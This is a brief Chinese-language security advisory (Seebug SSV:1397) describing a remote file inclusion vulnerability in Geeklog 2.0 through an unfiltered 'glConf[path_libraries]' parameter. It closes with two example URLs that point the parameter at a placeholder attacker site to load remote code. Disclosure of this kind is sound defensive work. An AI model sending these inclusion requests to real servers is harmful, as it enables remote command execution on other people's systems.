Geeklog远程文件包含漏洞

2007-02-11T00:00:00
ID SSV:1397
Type seebug
Reporter Root
Modified 2007-02-11T00:00:00

Description

Geeklog是一款基于PHP的WEB应用程序。 Geeklog不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'glConf[path_libraries]'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。

Geeklog 2.0

目前没有解决方案提供: <a href="http://geeklog.sourceforge.net/" target="_blank">http://geeklog.sourceforge.net/</a>

                                        
                                            
                                                http://www.example.com/[path]/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=attacker&nbsp;site
http://www.example.com/[path]/Geeklog/MVCnPHP/ViewInterface.php?glConf[path_libraries]=attacker&nbsp;site